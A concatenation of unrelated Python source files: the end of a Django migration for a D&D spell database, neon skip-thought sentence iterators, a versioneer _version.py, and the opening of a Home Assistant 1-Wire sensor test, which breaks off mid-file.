'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'arcane_focus_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'area': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'casting_time': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'class_levels': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['dnd.CharacterClass']", 'through': "orm['dnd.SpellClassLevel']", 'symmetrical': 'False'}),
'description': ('django.db.models.fields.TextField', [], {}),
'descriptors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['dnd.SpellDescriptor']", 'symmetrical': 'False', 'blank': 'True'}),
'divine_focus_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'domain_levels': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['dnd.Domain']", 'through': "orm['dnd.SpellDomainLevel']", 'symmetrical': 'False'}),
'duration': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'material_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'page': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'rulebook': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Rulebook']"}),
'saving_throw': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'school': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.SpellSchool']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '72', 'db_index': 'True'}),
'somatic_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'spell_resistance': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'sub_school': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.SpellSubSchool']", 'null': 'True', 'blank': 'True'}),
'target': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'verbal_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'xp_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'dnd.spellclasslevel': {
'Meta': {'ordering': "['spell', 'level']", 'unique_together': "(('character_class', 'spell'),)", 'object_name': 'SpellClassLevel'},
'character_class': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.CharacterClass']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'spell': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Spell']"})
},
'dnd.spelldescriptor': {
'Meta': {'ordering': "['name']", 'object_name': 'SpellDescriptor'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '72', 'db_index': 'True'})
},
'dnd.spelldomainlevel': {
'Meta': {'ordering': "['spell', 'level']", 'unique_together': "(('domain', 'spell'),)", 'object_name': 'SpellDomainLevel'},
'domain': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Domain']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'spell': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Spell']"})
},
'dnd.spellschool': {
'Meta': {'ordering': "['name']", 'object_name': 'SpellSchool'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '40', 'db_index': 'True'})
},
'dnd.spellsubschool': {
'Meta': {'ordering': "['name']", 'object_name': 'SpellSubSchool'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '40', 'db_index': 'True'})
}
}
complete_apps = ['dnd']
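# A South schema migration such as this one is typically applied with
# `python manage.py migrate dnd` (South then runs forwards()); rolling back to
# an earlier migration runs backwards(). The exact migration numbering is not
# shown in this excerpt.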
|
|
#!/usr/bin/env python
# ******************************************************************************
# Copyright 2017-2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
from __future__ import division
import numpy as np
import h5py
import copy
from neon.data.dataiterator import NervanaDataIterator
class SentenceEncode(NervanaDataIterator):
"""
This class defines an iterator that loads sentences and serves them in a
form suitable for encoding them into skip-thought vectors
"""
def __init__(self, sentences, sentence_text, nsamples, nwords,
max_len=100, index_from=2):
"""
Construct a sentence dataset object.
Build the context for the skip-thought model.
Arguments:
sentences: list of tokenized (and int-encoded) sentences to use for iteration
sentence_text: list of raw text sentences
nsamples: number of sentences
nwords: number of words in vocab
"""
super(SentenceEncode, self).__init__(name=None)
self.nsamples = nsamples
self.nwords = nwords
self.batch_index = 0
self.nbatches = 0
self.max_len = max_len
self.index_from = index_from
# group the sentences to triplets
source = sentences[:nsamples]
source_text = sentence_text[:nsamples]
extra_sent = len(source) % self.be.bsz
self.nbatches = len(source) // self.be.bsz
self.ndata = self.nbatches * self.be.bsz # no leftovers
if extra_sent:
source = source[:-extra_sent]
source_text = source_text[:-extra_sent]
# get sentence length stats based on the input sentence length
self.sent_len = dict((i, min(len(c), self.max_len)) for i, c in enumerate(source))
self.X = source
self.X_text = source_text
# inputs using embeddings
self.dev_X = self.be.iobuf(self.max_len, dtype=np.int32)
# NumPy staging array for noncontiguous data; holds an entire minibatch
self.X_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
self.shape = (self.max_len, 1)
def reset(self):
"""
For resetting the starting index of this dataset back to zero.
Relevant when one wants to run repeated evaluations on the dataset but
doesn't want to wrap around for the last uneven minibatch.
Not necessary when ndata is divisible by the batch size.
"""
self.batch_index = 0
def __iter__(self):
"""
Generator that can be used to iterate over this dataset
"""
self.batch_index = 0
while self.batch_index < self.nbatches:
self.X_np.fill(0)
idx = range(self.batch_index * self.be.bsz, (self.batch_index + 1) * self.be.bsz)
for i, ix in enumerate(idx):
s_len = self.sent_len[ix]
self.X_np[-s_len:, i] = self.X[ix][-s_len:] + self.index_from
self.dev_X.set(self.X_np)
self.batch_index += 1
yield (self.dev_X, None)
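# A rough usage sketch for SentenceEncode (illustrative only; it assumes a
# neon backend has already been generated so that self.be exists, and that
# `tokenized`/`raw_text` hold the pre-tokenized corpus and its raw text):
#
#     encode_set = SentenceEncode(tokenized, raw_text, nsamples=len(tokenized),
#                                 nwords=20000, max_len=100)
#     for dev_X, _ in encode_set:
#         # dev_X is a (max_len, bsz) device buffer of left-padded word indices
#         vectors = encoder_model.fprop(dev_X, inference=True)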
# --------------------------------------------------------
# Modified from: Skip-Thoughts
# Licensed under Apache License 2.0 [see LICENSE for details]
# Written by Ryan Kiros
# --------------------------------------------------------
class SentenceHomogenous(NervanaDataIterator):
"""
This class defines an iterator for loading and iterating the sentences in
a structure to train the skip-thought vectors
"""
def __init__(self, data_file=None, sent_name=None, text_name=None,
nwords=None, max_len=30, index_from=2, eos=3):
"""
Construct a sentence dataset object.
Build the context for the skip-thought model.
Arguments:
data_file (str): path to hdf5 file containing sentences
sent_name (str): name of tokenized dataset
text_name (str): name of raw text dataset
nwords (int): size of vocabulary
max_len (int): maximum number of words per sentence
index_from (int): index offset for padding (0) and OOV (1)
eos (int): index of EOS token
"""
super(SentenceHomogenous, self).__init__(name=None)
self.nwords = nwords
self.batch_index = 0
self.nbatches = 0
self.max_len = max_len
self.index_from = index_from
self.eos = eos
self.data_file = data_file
self.sent_name = sent_name
self.text_name = text_name
h5f = h5py.File(self.data_file, 'r+')
# Extract sentences array from h5 file and make copy in memory
sentences = h5f[self.sent_name][:]
# Load sentence raw text if desired
# sentence_text = h5f[self.text_name]
self.nsamples = h5f[self.sent_name].attrs['nsample'] - 2
# Use shifted view of in-memory copy of sentences to group sentences into triplets
self.source = sentences[1:-1]
self.forward = sentences[2:]
self.backward = sentences[:-2]
self.lengths = [len(cc) for cc in self.source]
self.len_unique = np.unique(self.lengths)
self.len_unique = [ll for ll in self.len_unique if ll <= self.max_len]
self.len_indicies = dict()
self.len_counts = dict()
for ll in self.len_unique:
self.len_indicies[ll] = np.where(self.lengths == ll)[0]
self.len_counts[ll] = len(self.len_indicies[ll])
# Compute number of batches of homogeneous lengths
self.nbatches = 0
for ll in self.len_unique:
self.nbatches += int(np.ceil(self.len_counts[ll] / float(self.be.bsz)))
# compute the total number of samples (including empty samples in minibatches)
self.ndata = self.nbatches * self.be.bsz
self.len_curr_counts = copy.copy(self.len_counts)
# inputs using embeddings
self.dev_X = self.be.iobuf(self.max_len, dtype=np.int32)
self.dev_X_p = self.be.iobuf(self.max_len, dtype=np.int32) # previous sentence as input
self.dev_X_n = self.be.iobuf(self.max_len, dtype=np.int32) # next sentence as input
# NumPy staging arrays for noncontiguous data; each holds an entire minibatch
self.X_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
self.X_p_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
self.X_n_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
# flat output labels, do one-hot on device
self.dev_y_p_flat = self.be.iobuf((1, self.max_len), dtype=np.int32)
self.dev_y_n_flat = self.be.iobuf((1, self.max_len), dtype=np.int32)
self.dev_y_p = self.be.iobuf((nwords, self.max_len), dtype=np.int32)
self.dev_y_n = self.be.iobuf((nwords, self.max_len), dtype=np.int32)
# output labels and masks to deal with variable length sentences
self.dev_y_p_mask = self.be.iobuf((nwords, self.max_len), dtype=np.int32)
self.dev_y_n_mask = self.be.iobuf((nwords, self.max_len), dtype=np.int32)
self.dev_y_p_mask_list = self.get_bsz(self.dev_y_p_mask, self.max_len)
self.dev_y_n_mask_list = self.get_bsz(self.dev_y_n_mask, self.max_len)
# for the flat label
self.y_p_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
self.y_n_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
self.clear_list = [self.X_np, self.X_p_np, self.X_n_np,
self.y_p_np, self.y_n_np,
self.dev_y_p_mask,
self.dev_y_n_mask]
self.shape = [(self.max_len, 1), (self.max_len, 1), (self.max_len, 1)]
h5f.close()
self.reset()
def reset(self):
"""
For resetting the starting index of this dataset back to zero.
Relevant when one wants to run repeated evaluations on the dataset but
doesn't want to wrap around for the last uneven minibatch.
Not necessary when ndata is divisible by the batch size.
"""
self.batch_index = 0
self.len_curr_counts = copy.copy(self.len_counts)
self.len_unique = np.random.permutation(self.len_unique)
self.len_indices_pos = dict()
for ll in self.len_unique:
self.len_indices_pos[ll] = 0
self.len_indicies[ll] = np.random.permutation(self.len_indicies[ll])
self.len_idx = -1
def next(self):
"""
Method called by iterator to get a new batch of sentence triplets:
(source, forward, backward). Batches are grouped by sentence length (the
lengths themselves are visited in a shuffled order), and the source sentences
within each batch all have the same length.
"""
self.clear_device_buffer()
# Select the next length which we haven't used up yet
count = 0
while True:
self.len_idx = np.mod(self.len_idx+1, len(self.len_unique))
if self.len_curr_counts[self.len_unique[self.len_idx]] > 0:
break
count += 1
if count >= len(self.len_unique):
break
if count >= len(self.len_unique):
self.reset()
raise StopIteration()
curr_len = self.len_unique[self.len_idx]
# get the batch size
curr_batch_size = np.minimum(self.be.bsz,
self.len_curr_counts[curr_len])
curr_pos = self.len_indices_pos[curr_len]
curr_indices = self.len_indicies[curr_len][curr_pos:curr_pos+curr_batch_size]
self.len_indices_pos[curr_len] += curr_batch_size
self.len_curr_counts[curr_len] -= curr_batch_size
# the forward/backward batches are the sentences after and before each source sentence
source_batch = [self.source[ii] for ii in curr_indices]
forward_batch = [self.forward[ii] for ii in curr_indices]
backward_batch = [self.backward[ii] for ii in curr_indices]
# Loop over the batch: clip each sentence by length and prepend <eos> to the decoder inputs
for i in range(len(source_batch)):
l_s = min(len(source_batch[i]), self.max_len)
if len(source_batch[i][-l_s:]) == 0:
continue
# NO FLIPPING of the source sentence
self.X_np[-l_s:, i] = source_batch[i][-l_s:] + self.index_from
l_p = min(len(backward_batch[i]), self.max_len)
# clip a long sentence from the left
# for decoder input: take the sent_length-1, prepend a <eos>
# for decoder output: take the sent_length
self.X_p_np[:l_p, i] = [self.eos] + (backward_batch[i][-l_p:-1] +
self.index_from).tolist()
self.y_p_np[:l_p, i] = backward_batch[i][-l_p:] + self.index_from
self.dev_y_p_mask_list[i][:, :l_p] = 1
l_n = min(len(forward_batch[i]), self.max_len)
self.X_n_np[:l_n, i] = [self.eos] + (forward_batch[i][-l_n:-1] +
self.index_from).tolist()
self.y_n_np[:l_n, i] = forward_batch[i][-l_n:] + self.index_from
self.dev_y_n_mask_list[i][:, :l_n] = 1
self.dev_X.set(self.X_np)
self.dev_X_p.set(self.X_p_np)
self.dev_X_n.set(self.X_n_np)
self.dev_y_p_flat.set(self.y_p_np.reshape(1, -1))
self.dev_y_n_flat.set(self.y_n_np.reshape(1, -1))
self.dev_y_p[:] = self.be.onehot(self.dev_y_p_flat, axis=0)
self.dev_y_n[:] = self.be.onehot(self.dev_y_n_flat, axis=0)
self.batch_index += 1
return (self.dev_X, self.dev_X_p, self.dev_X_n), \
((self.dev_y_p, self.dev_y_p_mask), (self.dev_y_n, self.dev_y_n_mask))
def __iter__(self):
"""
Generator that can be used to iterate over this dataset
Sentences longer than max_len are clipped from the left.
encoder input: take the (clipped) sentence and pad with 0 from the left
decoder input: drop the last token, prepend an <eos>, pad with 0 from the right
decoder output: take the full (clipped) sentence, pad with 0 from the right
"""
return self
def clear_device_buffer(self):
""" Clear the buffers used to hold batches. """
if self.clear_list:
[dev.fill(0) for dev in self.clear_list]
def get_bsz(self, x, nsteps):
if x is None:
return [None for b in range(self.be.bsz)]
xs = x.reshape(-1, nsteps, self.be.bsz)
return [xs[:, :, b] for b in range(self.be.bsz)]
__next__ = next # Python 3.x compatibility
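# A rough training-data usage sketch (illustrative only; the file and dataset
# names are assumptions, and a neon backend must already exist):
#
#     train_set = SentenceHomogenous(data_file='corpus.h5', sent_name='train',
#                                    text_name='report_train', nwords=20000,
#                                    max_len=30)
#     for (X, X_p, X_n), ((y_p, y_p_mask), (y_n, y_n_mask)) in train_set:
#         ...  # feed the triplet into the skip-thought encoder/decoder model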
|
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
from __future__ import print_function
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "docker-make/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
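# For example (values assumed for illustration): with closest-tag "2.0",
# distance 0, short "deadbee" and a dirty tree, this renders
# "2.0+0.gdeadbee.dirty"; a clean build exactly on the tag renders just "2.0".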
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always --long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
|
|
"""Tests for 1-Wire devices connected on OWServer."""
from unittest.mock import patch
from pyownet.protocol import Error as ProtocolError
import pytest
from homeassistant.components.onewire.const import (
DEFAULT_OWSERVER_PORT,
DOMAIN,
PRESSURE_CBAR,
)
from homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN
from homeassistant.const import PERCENTAGE, TEMP_CELSIUS
from homeassistant.setup import async_setup_component
from tests.common import mock_registry
MOCK_CONFIG = {
"sensor": {
"platform": DOMAIN,
"host": "localhost",
"port": DEFAULT_OWSERVER_PORT,
"names": {
"10.111111111111": "My DS18B20",
},
}
}
MOCK_DEVICE_SENSORS = {
"00.111111111111": {"sensors": []},
"10.111111111111": {
"sensors": [
{
"entity_id": "sensor.my_ds18b20_temperature",
"unique_id": "/10.111111111111/temperature",
"injected_value": b" 25.123",
"result": "25.1",
"unit": TEMP_CELSIUS,
},
]
},
"1D.111111111111": {
"sensors": [
{
"entity_id": "sensor.1d_111111111111_counter_a",
"unique_id": "/1D.111111111111/counter.A",
"injected_value": b" 251123",
"result": "251123",
"unit": "count",
},
{
"entity_id": "sensor.1d_111111111111_counter_b",
"unique_id": "/1D.111111111111/counter.B",
